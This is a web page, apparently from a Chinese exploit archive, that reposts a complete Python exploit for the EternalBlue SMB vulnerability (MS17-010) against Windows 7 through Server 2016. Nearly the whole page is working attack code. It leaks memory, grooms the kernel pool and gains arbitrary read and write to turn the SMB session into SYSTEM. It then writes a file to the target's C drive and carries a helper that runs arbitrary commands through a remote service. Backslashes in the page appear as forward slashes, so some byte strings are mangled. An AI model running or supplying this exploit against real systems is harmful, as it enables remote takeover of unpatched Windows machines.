Microsoft Windows 7 / 8.1 / 2008 R2 / 2012 R2 / 2016 R2 - EternalBlue SMB远程执行代码(MS17-010)

颓废 2019年5月19日10:40:05评论518 views字数 18085阅读60分17秒阅读模式
#!/usr/bin/python from impacket import smb, smbconnection from mysmb import MYSMB from struct import pack, unpack, unpack_from import sys import socket import time    ''' MS17-010 exploit for Windows 7+ by sleepya    Note: - The exploit should never crash a target (chance should be nearly 0%) - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed    Tested on: - Windows 2016 x64 - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 - Windows 8.1 x86 - Windows 7 SP1 x86 '''    USERNAME = '' PASSWORD = ''    ''' Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext() win7 x64 struct SrvSecContext {     DWORD xx1; // second WORD is size     DWORD refCnt;     PACCESS_TOKEN Token;  // 0x08     DWORD xx2;     BOOLEAN CopyOnOpen; // 0x14     BOOLEAN EffectiveOnly;     WORD xx3;     DWORD ImpersonationLevel; // 0x18     DWORD xx4;     BOOLEAN UsePsImpersonateClient; // 0x20 } win2012 x64 struct SrvSecContext {     DWORD xx1; // second WORD is size     DWORD refCnt;     QWORD xx2;     QWORD xx3;     PACCESS_TOKEN Token;  // 0x18     DWORD xx4;     BOOLEAN CopyOnOpen; // 0x24     BOOLEAN EffectiveOnly;     WORD xx3;     DWORD ImpersonationLevel; // 0x28     DWORD xx4;     BOOLEAN UsePsImpersonateClient; // 0x30 }    SrvImpersonateSecurityContext() is used in Windows 7 and later before doing any operation as logged on user. It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. From, if Token is NULL, PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns STATUS_SUCCESS when Token is NULL. If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM) to do all SMB operations. Note: fake Token might be possible, but NULL token is much easier. ''' WIN7_INFO = {     'SESSION_SECCTX_OFFSET': 0xa0,     'SESSION_ISNULL_OFFSET': 0xba,     'FAKE_SECCTX': pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),     'SECCTX_SIZE': 0x28, }    WIN7_32_INFO = {     'SESSION_SECCTX_OFFSET': 0x80,     'SESSION_ISNULL_OFFSET': 0x96,     'FAKE_SECCTX': pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),     'SECCTX_SIZE': 0x1c, }    # win8+ info WIN8_INFO = {     'SESSION_SECCTX_OFFSET': 0xb0,     'SESSION_ISNULL_OFFSET': 0xca,     'FAKE_SECCTX': pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),     'SECCTX_SIZE': 0x38, }    WIN8_32_INFO = {     'SESSION_SECCTX_OFFSET': 0x88,     'SESSION_ISNULL_OFFSET': 0x9e,     'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),     'SECCTX_SIZE': 0x24, }    X86_INFO = {     'PTR_SIZE' : 4,     'PTR_FMT' : 'I',     'FRAG_TAG_OFFSET' : 12,     'POOL_ALIGN' : 8,     'SRV_BUFHDR_SIZE' : 8,     'TRANS_SIZE' : 0xa0,  # struct size     'TRANS_FLINK_OFFSET' : 0x18,     'TRANS_INPARAM_OFFSET' : 0x40,     'TRANS_OUTPARAM_OFFSET' : 0x44,     'TRANS_INDATA_OFFSET' : 0x48,     'TRANS_OUTDATA_OFFSET' : 0x4c,     'TRANS_FUNCTION_OFFSET' : 0x72,     'TRANS_MID_OFFSET' : 0x80, }    X64_INFO = {     'PTR_SIZE' : 8,     'PTR_FMT' : 'Q',     'FRAG_TAG_OFFSET' : 0x14,     'POOL_ALIGN' : 0x10,     'SRV_BUFHDR_SIZE' : 0x10,     'TRANS_SIZE' : 0xf8,  # struct size     'TRANS_FLINK_OFFSET' : 0x28,     'TRANS_INPARAM_OFFSET' : 0x70,     'TRANS_OUTPARAM_OFFSET' : 0x78,     'TRANS_INDATA_OFFSET' : 0x80,     'TRANS_OUTDATA_OFFSET' : 0x88,     'TRANS_FUNCTION_OFFSET' : 0xb2,     'TRANS_MID_OFFSET' : 0xc0, }       def wait_for_request_processed(conn):     #time.sleep(0.05)     # send echo is faster than sleep(0.05) when connection is very good     conn.send_echo('a')    special_mid = 0 extra_last_mid = 0 def reset_extra_mid(conn):     global extra_last_mid, special_mid     special_mid = (conn.next_mid() & 0xff00) - 0x100     extra_last_mid = special_mid        def next_extra_mid():     global extra_last_mid     extra_last_mid += 1     return extra_last_mid    # Borrow 'groom' and 'bride' word from NSA tool # GROOM_TRANS_SIZE includes transaction name, parameters and data GROOM_TRANS_SIZE = 0x5010       def calc_alloc_size(size, align_size):     return (size + align_size - 1) & ~(align_size-1)    def leak_frag_size(conn, tid, fid, info):     # A "Frag" pool is placed after the large pool allocation if last page has some free space left.     # A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version.     # To make exploit more generic, exploit does info leak to find a "Frag" pool size.     # From the leak info, we can determine the target architecture too.     mid = conn.next_mid()     req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-4)     req2 = conn.create_nt_trans_secondary_packet(mid, data='B'*276) # leak more 276 bytes            conn.send_raw(req1[:-8])     conn.send_raw(req1[-8:]+req2)     leakData = conn.recv_transaction_data(mid, 0x10d0+276)     leakData = leakData[0x10d4:]  # skip parameters and its own input     if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':         print('Target is 32 bit')         if info['SESSION_SECCTX_OFFSET'] == WIN7_INFO['SESSION_SECCTX_OFFSET']:             info.update(WIN7_32_INFO)         elif info['SESSION_SECCTX_OFFSET'] == WIN8_INFO['SESSION_SECCTX_OFFSET']:             info.update(WIN8_32_INFO)         else:             print('The exploit does not support this 32 bit target')             sys.exit()         info.update(X86_INFO)     elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':         print('Target is 64 bit')         info.update(X64_INFO)     else:         print('Not found Frag pool tag in leak data')         sys.exit()            # Calculate frag pool size     info['FRAG_POOL_SIZE'] = ord(leakData[ info['FRAG_TAG_OFFSET']-2 ]) * info['POOL_ALIGN']     print('Got frag size: 0x{:x}'.format(info['FRAG_POOL_SIZE']))        # groom: srv buffer header     info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])     print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))     # groom paramters and data is alignment by 8 because it is NT_TRANS     info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - 4 - 4 - info['TRANS_SIZE']  # empty transaction name (4), alignment (4)        # bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)     bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']     info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])     print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))     # bride paramters and data is alignment by 4 because it is TRANS     info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - 4 - info['TRANS_SIZE']  # empty transaction name (4)        return info['FRAG_POOL_SIZE']       def align_transaction_and_leak(conn, tid, fid, info, numFill=4):     trans_param = pack('<HH', fid, 0)  # param for NT_RENAME     # fill large pagedpool holes (maybe no need)     for i in range(numFill):         conn.send_nt_trans(5, param=trans_param, totalDataCount=0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0)        mid_ntrename = conn.next_mid()     req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A'*0x10d0, maxParameterCount=info['GROOM_DATA_SIZE']-0x10d0)     req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B'*276) # leak more 276 bytes        req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE']-0x1000, maxParameterCount=0x1000)     reqs = []     for i in range(12):         mid = next_extra_mid()         reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE']-0x200, totalParameterCount=0x200, maxDataCount=0, maxParameterCount=0))        conn.send_raw(req1[:-8])     conn.send_raw(req1[-8:]+req2+req3+''.join(reqs))            # expected transactions alignment ("Frag" pool is not shown)     #     #    |         5 * PAGE_SIZE         |   PAGE_SIZE    |         5 * PAGE_SIZE         |   PAGE_SIZE    |     #    +-------------------------------+----------------+-------------------------------+----------------+     #    |    GROOM mid=mid_ntrename        |  extra_mid1 |         GROOM mid=fid            |  extra_mid2 |     #    +-------------------------------+----------------+-------------------------------+----------------+     #     # If transactions are aligned as we expected, BRIDE transaction with mid=extra_mid1 will be leaked.     # From leaked transaction, we get     # - leaked transaction address from InParameter or InData     # - transaction, with mid=extra_mid2, address from LIST_ENTRY.Flink     # With these information, we can verify the transaction aligment from displacement.        leakData = conn.recv_transaction_data(mid_ntrename, 0x10d0+276)     leakData = leakData[0x10d4:]  # skip parameters and its own input     #open('leak.dat', 'wb').write(leakData)        if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET']+4] != 'Frag':         print('Not found Frag pool tag in leak data')         return None            # ================================     # verify leak data     # ================================     leakData = leakData[info['FRAG_TAG_OFFSET']-4+info['FRAG_POOL_SIZE']:]     # check pool tag and size value in buffer header     expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])     leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']     if leakData[0x4:0x8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN']+2] != expected_size or leakData[leakTransOffset+2:leakTransOffset+4] != expected_size:         print('No transaction struct in leak data')         return None        leakTrans = leakData[leakTransOffset:]        ptrf = info['PTR_FMT']     _, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+ptrf*5, leakTrans, 8)     inparam_value = unpack_from('<'+ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]     leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]        print('CONNECTION: 0x{:x}'.format(connection_addr))     print('SESSION: 0x{:x}'.format(session_addr))     print('FLINK: 0x{:x}'.format(flink_value))     print('InParam: 0x{:x}'.format(inparam_value))     print('MID: 0x{:x}'.format(leak_mid))        next_page_addr = (inparam_value & 0xfffffffffffff000) + 0x1000     if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:         print('unexpected alignment, diff: 0x{:x}'.format(flink_value - next_page_addr))         return None     # trans1: leak transaction     # trans2: next transaction     return {         'connection': connection_addr,         'session': session_addr,         'next_page_addr': next_page_addr,         'trans1_mid': leak_mid,         'trans1_addr': inparam_value - info['TRANS_SIZE'] - 4,         'trans2_addr': flink_value - info['TRANS_FLINK_OFFSET'],         'special_mid': special_mid,     }    def read_data(conn, info, read_addr, read_size):     fmt = info['PTR_FMT']     # modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data     # modify trans2.*ParameterCount and trans2.*DataCount to limit data     new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr)  # OutParameter, InData, OutData     new_data += pack('<II', 0, 0)  # SetupCount, MaxSetupCount     new_data += pack('<III', 8, 8, 8)  # ParamterCount, TotalParamterCount, MaxParameterCount     new_data += pack('<III', read_size, read_size, read_size)  # DataCount, TotalDataCount, MaxDataCount     new_data += pack('<HH', 0, 5)  # Category, Function (NT_RENAME)     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])            # create one more transaction before leaking data     # - next transaction can be used for arbitrary read/write after the current trans2 is done     # - next transaction address is from TransactionListEntry.Flink value     conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)        # finish the trans2 to leak     conn.send_nt_trans_secondary(mid=info['trans2_mid'])     read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)            # set new trans2 address     info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']            # set trans1.InData to &trans2     conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])     wait_for_request_processed(conn)        # modify trans2 mid     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])     wait_for_request_processed(conn)            return read_data[8:]  # no need to return parameter       def write_data(conn, info, write_addr, write_data):     # trans2.InData     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])     wait_for_request_processed(conn)            # write data     conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)     wait_for_request_processed(conn)       def exploit(target, pipe_name):     conn = MYSMB(target)            # set NODELAY to make exploit much faster     conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)        info = {}        conn.login(USERNAME, PASSWORD, maxBufferSize=4356)     server_os = conn.get_server_os()     print('Target OS: '+server_os)     if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):         info.update(WIN7_INFO)     elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 "):         info.update(WIN8_INFO)     else:         print('This exploit does not support this target')         sys.exit()        # ================================     # try align pagedpool and leak info until satisfy     # ================================     leakInfo = None     # max attempt: 10     for i in range(10):         tid = conn.tree_connect_andx('////'+target+'//'+'IPC$')         conn.set_default_tid(tid)         # fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.         fid = conn.nt_create_andx(tid, pipe_name)         if 'FRAG_POOL_SIZE' not in info:             leak_frag_size(conn, tid, fid, info)         reset_extra_mid(conn)         leakInfo = align_transaction_and_leak(conn, tid, fid, info)         if leakInfo is not None:             break         print('leak failed... try again')         conn.close(tid, fid)         conn.disconnect_tree(tid)     if leakInfo is None:         return False            info['fid'] = fid     info.update(leakInfo)        # ================================     # shift trans1.Indata ptr with SmbWriteAndX     # ================================     shift_indata_byte = 0x200     conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)        # Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.     #       So the below operation is still dangerous. Write only 1 byte with '/x00' might be safe even alignment is wrong.     # maxParameterCount (0x1000), trans name (4), param (4)     indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte     indata_next_trans_displacement = info['trans2_addr'] - indata_value     conn.send_nt_trans_secondary(mid=fid, data='/x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])     wait_for_request_processed(conn)        # if the overwritten is correct, a modified transaction mid should be special_mid now.     # a new transaction with special_mid should be error.     recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')     if recvPkt.getNTStatus() != 0x10002:  # invalid SMB         print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))         print('!!! Write to wrong place !!!')         print('the target might be crashed')         sys.exit()        print('success controlling groom transaction')        # NSA exploit set refCnt on leaked transaction to very large number for reading data repeatly     # but this method make the transation never get freed     # I will avoid memory leak            # ================================     # modify trans1 struct to be used for arbitrary read/write     # ================================     print('modify trans1 struct for arbitrary read/write')     fmt = info['PTR_FMT']     # modify trans_special.InData to &trans1     conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])     wait_for_request_processed(conn)        # modify     # - trans1.InParameter to &trans1. so we can modify trans1 struct with itself     # - trans1.InData to &trans2. so we can modify trans2 easily     conn.send_nt_trans_secondary(mid=info['special_mid'], data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])     wait_for_request_processed(conn)        # modify trans2.mid     info['trans2_mid'] = conn.next_mid()     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])        # Now, read_data() and write_data() can be used for arbitrary read and write.     # ================================     # Modify this SMB session to be SYSTEM     # ================================      # Note: Windows XP stores only PCtxtHandle and uses ImpersonateSecurityContext() for impersonation, so this     #         method does not work on Windows XP. But with arbitrary read/write, code execution is not difficult.            print('make this SMB session to be SYSTEM')     # IsNullSession = 0, IsAdmin = 1     write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '/x00/x01')        # read session struct to get SecurityContext address     sessionData = read_data(conn, info, info['session'], 0x100)     secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]        # copy SecurityContext for restoration     secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])        print('overwriting session security context')     # see FAKE_SECCTX detail at top of the file     write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])        # ================================     # do whatever we want as SYSTEM over this SMB connection     # ================================      try:         smb_pwn(conn)     except:         pass        # restore SecurityContext. If the exploit does not use null session, PCtxtHandle will be leaked.     write_data(conn, info, secCtxAddr, secCtxData)        conn.disconnect_tree(tid)     conn.logoff()     conn.get_socket().close()     return True    def smb_pwn(conn):     smbConn = smbconnection.SMBConnection(conn.get_remote_host(), conn.get_remote_host(), existingConnection=conn, manualNegotiate=True)            print('creating file c://pwned.txt on the target')     tid2 = smbConn.connectTree('C$')     fid2 = smbConn.createFile(tid2, '/pwned.txt')     smbConn.closeFile(tid2, fid2)     smbConn.disconnectTree(tid2)            #service_exec(smbConn, r'cmd /c copy c:/pwned.txt c:/pwned_exec.txt')    # based on impacket/examples/ def service_exec(smbConn, cmd):     import random     import string     from impacket.dcerpc.v5 import transport, srvs, scmr            service_name = ''.join([random.choice(string.letters) for i in range(4)])        # Setup up a DCE SMBTransport with the connection already in place     rpctransport = transport.SMBTransport(smbConn.getRemoteHost(), smbConn.getRemoteHost(), filename=r'/svcctl', smb_connection=smbConn)     rpcsvc = rpctransport.get_dce_rpc()     rpcsvc.connect()     rpcsvc.bind(scmr.MSRPC_UUID_SCMR)     svnHandle = None     try:         print("Opening SVCManager on %s....." % smbConn.getRemoteHost())         resp = scmr.hROpenSCManagerW(rpcsvc)         svcHandle = resp['lpScHandle']                    # First we try to open the service in case it exists. If it does, we remove it.         try:             resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'/x00')         except Exception, e:             if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:                 raise e  # Unexpected error         else:             # It exists, remove it             scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])             scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])                    print('Creating service %s.....' % service_name)         resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '/x00', service_name + '/x00', lpBinaryPathName=cmd + '/x00')         serviceHandle = resp['lpServiceHandle']                    if serviceHandle:             # Start service             try:                 print('Starting service %s.....' % service_name)                 scmr.hRStartServiceW(rpcsvc, serviceHandle)                 # is it really need to stop?                 # using command line always makes starting service fail because SetServiceStatus() does not get called                 print('Stoping service %s.....' % service_name)                 scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)             except Exception, e:                 print(str(e))                            print('Removing service %s.....' % service_name)             scmr.hRDeleteService(rpcsvc, serviceHandle)             scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)     except Exception, e:         print("ServiceExec Error on: %s" % smbConn.getRemoteHost())         print(str(e))     finally:         if svcHandle:             scmr.hRCloseServiceHandle(rpcsvc, svcHandle)        rpcsvc.disconnect()       if len(sys.argv) != 3:     print("{} <ip> <pipe_name>".format(sys.argv[0]))     sys.exit(1)    target = sys.argv[1] pipe_name = sys.argv[2]    exploit(target, pipe_name) print('Done') 

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                   Microsoft Windows 7 / 8.1 / 2008 R2 / 2012 R2 / 2016 R2 - EternalBlue SMB远程执行代码(MS17-010)


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